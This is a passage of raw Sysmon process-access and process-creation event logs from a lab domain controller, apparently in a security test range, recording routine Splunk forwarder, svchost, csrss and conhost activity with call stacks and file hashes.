10341000x800000000000000029351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.377{7901BC46-53FF-6008-AE06-00000000A301}35562840C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.220{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-53FF-6008-AE06-00000000A301}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.220{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.220{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.220{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.220{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.220{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53FF-6008-AE06-00000000A301}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.220{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-53FF-6008-AE06-00000000A301}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:07.221{7901BC46-53FF-6008-AE06-00000000A301}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.392{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5400-6008-B006-00000000A301}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.392{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.392{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.392{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.392{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.392{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5400-6008-B006-00000000A301}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.392{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5400-6008-B006-00000000A301}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:08.394{7901BC46-5400-6008-B006-00000000A301}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.673{7901BC46-5401-6008-B106-00000000A301}51447868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.533{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5401-6008-B106-00000000A301}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.533{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.533{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.533{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.533{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.533{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5401-6008-B106-00000000A301}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.533{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5401-6008-B106-00000000A301}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:09.534{7901BC46-5401-6008-B106-00000000A301}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.283{7901BC46-5402-6008-B206-00000000A301}51243964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.142{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5402-6008-B206-00000000A301}5124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.142{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 